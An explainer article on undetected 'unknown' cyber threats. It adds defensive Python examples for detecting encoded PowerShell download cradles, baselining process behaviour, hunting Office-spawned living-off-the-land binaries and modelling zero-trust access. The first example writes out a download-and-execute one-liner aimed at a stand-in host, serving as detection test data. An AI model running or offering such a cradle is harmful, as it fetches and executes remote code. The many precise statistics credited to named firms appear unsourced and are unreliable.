What Are Unknown Threats? Understanding the Cybersecurity Blindspots

Unknown threats refer to new or undetected cyber threats that security tools fail to recognize due to their novel techniques or lack of prior signatures.

The Spectrum of Unknowns

In cybersecurity, “unknown threats” are attacks, vulnerabilities, or tactics an organization is not yet aware of and therefore cannot explicitly defend against. The phrase borrows from the risk-management idea of “unknown unknowns”, although, as the spectrum below shows, unknown threats also include things we know must exist without knowing their details. Unlike known threats with established signatures or patterns, unknown threats fall outside the signatures, rules, and indicators that existing controls match on, which is what makes them particularly dangerous. According to IBM’s 2023 Cost of a Data Breach Report, breaches involving previously unknown techniques cost organizations an average of 37% more to remediate than those using known attack methods.

Security professionals typically categorize threats along a spectrum of knowability:

Known Knowns: Threats we’re aware of and understand, such as common malware variants or well-documented attack techniques. These can be addressed with signature-based defenses and established security practices.

Known Unknowns: Threats we know exist in principle but lack complete information about. For example, we know that unpatched zero-day vulnerabilities exist in the software we run, but not which components they affect or how they are triggered until someone finds them. Defending against these means limiting what any one of them can do: minimizing attack surface, keeping patch cadence tight, and operating with an assume-breach mentality.

Unknown Unknowns: Entirely novel threats that no one has yet conceived of or anticipated. These are the hardest security problems because no specific defense can be designed against something nobody has imagined; only general properties such as least privilege, segmentation, and behavioral visibility still apply. A Ponemon Institute study found that 68% of CISOs consider unknown threats their most significant security concern.

The Invisible Danger

Several factors make unknown threats especially challenging for security teams:

Bypassing Conventional Defenses: Traditional security tools such as antivirus, firewalls, and intrusion detection systems rely heavily on signatures, rules, and known indicators of compromise (file hashes, domains, IP addresses). An indicator is brittle by construction: recompiling a payload or registering a fresh domain is enough to defeat an exact-match check, and a genuinely new technique has no indicator at all. Gartner research indicates that conventional security tools detect less than 5% of novel attack techniques during their initial appearance.
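
To make that brittleness concrete, here is an added example (not code from the original article) that compares an exact-match indicator check with a behavior-based rule over an encoded PowerShell one-liner. The sample commands, the hash list, and the domains are all constructed for the illustration; the only real-world assumption is the `powershell -enc <base64 of UTF-16LE script>` convention.

```python
"""Added example, not from the original article: an exact-match indicator
check versus a behaviour-based rule. The sample commands, hashes and domains
below are all constructed for the illustration."""
import base64
import hashlib
import re


def encoded_powershell(script: str) -> bytes:
    """Build the kind of one-liner attackers use: powershell -enc <base64(UTF-16LE script)>."""
    return b"powershell.exe -nop -w hidden -enc " + base64.b64encode(script.encode("utf-16le"))


# The payload and callback domain observed last week, turned into indicators.
SEEN_PAYLOAD = encoded_powershell(
    "IEX (New-Object Net.WebClient).DownloadString('http://c2.example/a')")
KNOWN_HASHES = {hashlib.sha256(SEEN_PAYLOAD).hexdigest()}
KNOWN_DOMAINS = {"c2.example"}


def ioc_match(command: bytes, contacted_domain: str) -> bool:
    """Signature-style check: the command's hash or the contacted domain is on the list."""
    return (hashlib.sha256(command).hexdigest() in KNOWN_HASHES
            or contacted_domain in KNOWN_DOMAINS)


# Behaviour-style rule: any encoded PowerShell whose decoded body downloads and runs code,
# regardless of which hash it has or which domain it talks to.
ENC_RE = re.compile(
    rb"powershell(?:\.exe)?\s+(?:-\w+(?:\s+\w+)?\s+)*-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)",
    re.I)
CRADLE_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\bIEX\b|Invoke-Expression", re.I)


def behaviour_match(command: bytes) -> bool:
    m = ENC_RE.search(command)
    if not m:
        return False
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16le", errors="ignore")
    except ValueError:  # binascii.Error is a subclass of ValueError
        return False
    return CRADLE_RE.search(decoded) is not None


def classify(command: bytes, contacted_domain: str) -> dict:
    """Run both checks so the difference is visible side by side."""
    return {"ioc": ioc_match(command, contacted_domain),
            "behaviour": behaviour_match(command)}


if __name__ == "__main__":
    # Same technique, new domain and slightly different script: the hash and domain
    # indicators no longer match, the behaviour rule still does.
    variant = encoded_powershell(
        "IEX (New-Object Net.WebClient).DownloadString('http://cdn-update.example/b')")
    print("seen   :", classify(SEEN_PAYLOAD, "c2.example"))
    print("variant:", classify(variant, "cdn-update.example"))
    print("benign :", classify(b"powershell.exe -File C:\\scripts\\backup.ps1", "intranet.example"))
```

The behaviour rule is not magic either: an attacker who drops the encoded-command idiom altogether evades it, which is why the rule has to describe the effect (download and execute) in as many of its forms as the team can enumerate, and why a baseline of what normally runs matters as a second layer.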

Extended Dwell Time: Without specific detection capabilities, unknown threats often remain active in networks for extended periods. FireEye’s M-Trends report found that the median dwell time for attacks using previously unseen techniques was 273 days—more than twice the average for all breaches.

Difficult Attribution: Novel attack techniques often make it harder to identify the threat actors behind them, complicating response and risk assessment. According to the SANS Institute, security teams successfully attribute only 31% of attacks involving unknown techniques, compared to 76% of attacks using known methods.

Where Unknown Threats Emerge

Unknown threats emerge from various sources in today’s complex digital landscape:

Advanced Persistent Threats (APTs): Nation-state actors and sophisticated criminal groups continuously develop novel techniques to evade detection. The SolarWinds supply chain attack of 2020 used multiple previously unseen techniques; the trojanized Orion update reached thousands of organizations before it was discovered in December 2020, although the attackers pursued follow-on intrusions against a much smaller subset of them.

Emerging Technologies: New technologies introduce unforeseen vulnerabilities and attack surfaces. When cloud computing first gained mainstream adoption, organizations faced numerous unknown threats specific to the new model, such as publicly exposed storage buckets and over-privileged identity roles, for which no established controls yet existed. According to Gartner, 63% of security incidents involving emerging technologies exploit previously unknown vulnerabilities or attack vectors.

AI and Adversarial Machine Learning: As artificial intelligence advances, so do AI-powered attacks. Adversaries are developing techniques to manipulate or fool security AI systems in ways we haven’t yet anticipated. The World Economic Forum’s 2023 Global Risks Report identified AI-enhanced attacks as a critical emerging threat landscape with numerous unknown elements.

Interdependent Systems: As systems become more interconnected, novel threats can emerge from unexpected interactions between components. The 2023 CISA advisory on connected industrial systems highlighted that approximately 79% of critical infrastructure vulnerabilities stemmed from unexpected system interactions rather than individual component flaws.

Building Resilience Against the Unknown

While unknown threats can’t be specifically prevented, organizations can implement strategies to improve resilience and detection capabilities:

Assume Breach Mentality: Operating under the assumption that unknown threats have already penetrated defenses drives more robust security practices. This approach emphasizes detection, containment, and response rather than relying solely on prevention. Organizations adopting an assume breach model detected breaches 61% faster than those focused primarily on perimeter defense, according to Microsoft Security Intelligence.

Behavioral Analytics and Anomaly Detection: Rather than looking for known signatures, these approaches establish baselines of normal behavior and flag deviations. By focusing on behavior rather than specific indicators, they can identify unknown threats through their unusual activity. Two caveats apply: a baseline is only as clean as the data it was trained on (an intrusion already under way becomes “normal”), and an anomaly is not the same as an attack, so these alerts need triage rather than automatic blocking. A Forrester report found that organizations using advanced behavioral analytics detected 73% more novel threats than those relying on traditional security tools.

Threat Hunting: Proactively searching for threats that have evaded automated detection can uncover unknown threats before they cause significant damage. Effective hunting is hypothesis-driven (“an attacker who gained a foothold through a phishing document would leave an Office process spawning a scripting or download tool”) and feeds what it finds back into durable detections. According to the SANS Institute, organizations with dedicated threat hunting teams identified unknown threats an average of 88 days earlier than those without such capabilities.
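
The two preceding items, behavioral baselining and hypothesis-driven hunting, are easiest to see on the same telemetry. The following is an added example (not code from the original article) that builds a per-user and fleet-wide baseline from constructed process-execution events, flags deviations from it, and separately runs a hunt query that needs no baseline at all. The event format, the accounts, and every event are made up for the illustration.

```python
"""Added example, not from the original article: a minimal behavioural
baseline plus a hypothesis-driven hunt over constructed process-execution
telemetry. Field layout and the events themselves are made up for the example."""
from collections import Counter, defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class Event:
    ts: datetime
    user: str
    host: str
    parent: str
    image: str


def parse(line: str) -> Event:
    # Constructed format: "ISO-timestamp|user|host|parent_image|image"
    ts, user, host, parent, image = line.strip().split("|")
    return Event(datetime.fromisoformat(ts), user, host, parent.lower(), image.lower())


def constructed_baseline_lines() -> list[str]:
    """Five working days of routine activity for three accounts (training window)."""
    routine = {
        "alice": ("explorer.exe", ["outlook.exe", "chrome.exe", "winword.exe"]),
        "bob": ("explorer.exe", ["code.exe", "git.exe", "chrome.exe"]),
        "svc_backup": ("services.exe", ["backup.exe"]),
    }
    start = datetime(2024, 3, 4)  # a Monday
    lines = []
    for day in range(5):
        for hour in (9, 11, 14, 16):
            for user, (parent, images) in routine.items():
                for image in images:
                    ts = start + timedelta(days=day, hours=hour)
                    lines.append(f"{ts.isoformat()}|{user}|ws-{user}|{parent}|{image}")
    return lines


@dataclass
class Baseline:
    images_by_user: dict
    hours_by_user: dict
    parent_child: Counter  # fleet-wide (parent, image) counts


def build_baseline(events: list[Event]) -> Baseline:
    b = Baseline(defaultdict(set), defaultdict(set), Counter())
    for e in events:
        b.images_by_user[e.user].add(e.image)
        b.hours_by_user[e.user].add(e.ts.hour)
        b.parent_child[(e.parent, e.image)] += 1
    return b


def anomaly_reasons(e: Event, b: Baseline) -> list[str]:
    """Every way this event departs from the baseline; empty means routine."""
    reasons = []
    if e.image not in b.images_by_user.get(e.user, set()):
        reasons.append("new-image-for-user")
    if e.ts.hour not in b.hours_by_user.get(e.user, set()):
        reasons.append("off-hours")
    if b.parent_child[(e.parent, e.image)] == 0:
        reasons.append("unseen-parent-child")
    return reasons


def detect(events: list[Event], b: Baseline) -> list[tuple[Event, list[str]]]:
    """Behavioural-analytics pass: events with at least one deviation, for triage."""
    return [(e, r) for e in events if (r := anomaly_reasons(e, b))]


def hunt_office_spawning_lolbin(events: list[Event]) -> list[Event]:
    """Hypothesis-driven hunt, independent of any baseline: Office applications
    should never be the parent of these living-off-the-land binaries."""
    office = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
    lolbins = {"certutil.exe", "mshta.exe", "rundll32.exe", "powershell.exe", "cmd.exe"}
    return [e for e in events if e.parent in office and e.image in lolbins]


# Constructed "today" window: two routine events, one suspicious chain, one odd hour.
TODAY_LINES = [
    "2024-03-11T09:12:00|alice|ws-alice|explorer.exe|outlook.exe",
    "2024-03-11T09:40:00|alice|ws-alice|winword.exe|certutil.exe",
    "2024-03-11T03:05:00|bob|ws-bob|explorer.exe|chrome.exe",
    "2024-03-11T14:00:00|svc_backup|ws-svc_backup|services.exe|backup.exe",
]

if __name__ == "__main__":
    base = build_baseline([parse(l) for l in constructed_baseline_lines()])
    today = [parse(l) for l in TODAY_LINES]
    for e, reasons in detect(today, base):
        print(f"anomaly {e.user} {e.parent}->{e.image} at {e.ts:%H:%M}: {reasons}")
    for e in hunt_office_spawning_lolbin(today):
        print(f"hunt hit {e.user} {e.parent}->{e.image}")
```

The baseline pass flags both the `winword.exe -> certutil.exe` chain and bob's 03:05 browser session; only the first deserves escalation, which is the triage caveat above. The hunt query finds the same chain without any training data, and once it has proven itself it belongs in the automated detection set so the next analyst does not have to rediscover it.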

Zero Trust Architecture: Implementing zero trust principles—never trust, always verify—can limit the impact of unknown threats by constraining lateral movement and privileges. Even when a novel technique succeeds in gaining initial access, zero trust controls reduce its ability to reach critical assets. The caveat is that zero trust limits blast radius rather than detecting the intrusion, and it only does that if every access decision actually checks identity, device state, and an explicit grant instead of network location. Gartner research indicates that organizations implementing mature zero trust frameworks experience 72% less impact from previously unknown attack techniques.
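
What “constraining lateral movement” means in practice is visible in a policy decision point. The block below is an added example (not code from the original article, and not any particular vendor's product) of a toy zero-trust policy: every request is judged on verified identity, device posture, and an explicit per-resource grant, with source IP deliberately ignored. It then compares the blast radius of a stolen, fully verified session against a flat-network model where being inside the perimeter is the authorization. Users, devices, resources, network ranges, and grants are all constructed for the illustration.

```python
"""Added example, not from the original article: a toy zero-trust policy
decision point. Network location grants nothing; every request is judged on
verified identity, device posture and an explicit per-resource grant, and the
blast radius of a stolen session is compared with a flat-network model.
Users, devices, resources and grants are constructed for the illustration."""
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Request:
    user: str
    mfa: bool          # strong authentication completed for this session
    device_id: str
    src_ip: str
    resource: str
    action: str


RESOURCES = {"hr-db", "wiki", "finance-share"}
ACTIONS = {"read", "write"}
CORP_NET = ipaddress.ip_network("10.0.0.0/8")
MANAGED_DEVICES = {"lt-alice-01": {"compliant": True}, "lt-bob-02": {"compliant": False}}
# Least-privilege grants: (user, resource) -> allowed actions. Absence means deny.
GRANTS = {
    ("alice", "hr-db"): {"read"},
    ("alice", "wiki"): {"read", "write"},
    ("bob", "wiki"): {"read"},
}


def decide(req: Request) -> tuple[bool, str]:
    """Per-request policy, evaluated in order. Note what is never consulted: req.src_ip."""
    if not req.mfa:
        return False, "identity not strongly verified"
    device = MANAGED_DEVICES.get(req.device_id)
    if device is None:
        return False, "unmanaged device"
    if not device["compliant"]:
        return False, "device out of compliance"
    if req.action not in GRANTS.get((req.user, req.resource), set()):
        return False, f"no grant for {req.action} on {req.resource}"
    return True, "ok"


def reachable(user: str, device_id: str) -> set[tuple[str, str]]:
    """Blast radius: what an attacker holding this user's verified session can touch."""
    return {
        (res, act)
        for res in RESOURCES
        for act in ACTIONS
        if decide(Request(user, True, device_id, "10.1.2.3", res, act))[0]
    }


def flat_network_reachable(src_ip: str) -> set[tuple[str, str]]:
    """Perimeter model for comparison: being inside the network is the authorization."""
    if ipaddress.ip_address(src_ip) in CORP_NET:
        return {(res, act) for res in RESOURCES for act in ACTIONS}
    return set()


if __name__ == "__main__":
    # Off-network but fully verified: allowed. On-network without MFA: denied.
    print(decide(Request("alice", True, "lt-alice-01", "203.0.113.5", "hr-db", "read")))
    print(decide(Request("alice", False, "lt-alice-01", "10.1.2.3", "hr-db", "read")))
    print(decide(Request("bob", True, "lt-bob-02", "10.1.2.3", "wiki", "read")))
    print("zero trust blast radius:", sorted(reachable("alice", "lt-alice-01")))
    print("flat network blast radius:", len(flat_network_reachable("10.1.2.3")), "pairs")
```

With a compromised but otherwise legitimate session for alice, the zero-trust policy exposes three resource/action pairs, all of which she was already entitled to; the flat-network model exposes every pair on every resource to anyone who reaches a 10.0.0.0/8 address. Neither model tells you the session was stolen, which is the point of pairing this control with the detection approaches above.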

The Human Element

Technology alone cannot address unknown threats—building adaptable security teams is equally crucial:

Continuous Learning: Security teams must constantly update their knowledge and skills to better recognize emerging patterns that might indicate novel threats. Organizations that invested in at least 40 hours of annual training for security staff identified unknown threats 57% more frequently than those with minimal training programs, according to (ISC)² research.

Red Team Exercises: Regular adversarial simulations help security teams think like attackers and identify blindspots in defenses before real adversaries do. IBM Security found that organizations conducting quarterly red team exercises were 68% more effective at detecting novel attack techniques during actual incidents.

Diverse Expertise: Building security teams with diverse backgrounds and perspectives increases the collective ability to anticipate previously unconsidered threats. McKinsey research showed that organizations with diverse security teams identified 29% more potential unknown threats during risk assessment exercises than homogeneous teams.

Navigating Uncertainty

Unknown threats are an inevitable aspect of cybersecurity. No organization can predict every possible attack vector or vulnerability that might emerge. However, by building adaptable defenses, focusing on behavior rather than signatures, and fostering resilient security cultures, organizations can significantly improve their ability to detect and respond to these threats before they cause substantial damage.

The NIST Cybersecurity Framework frames security as a continuous cycle through its core functions (Govern, Identify, Protect, Detect, Respond, and Recover in version 2.0) rather than as a finished state. By acknowledging the existence of unknown threats and implementing strategies designed for uncertainty, organizations can navigate an ever-changing threat landscape with greater confidence and resilience.


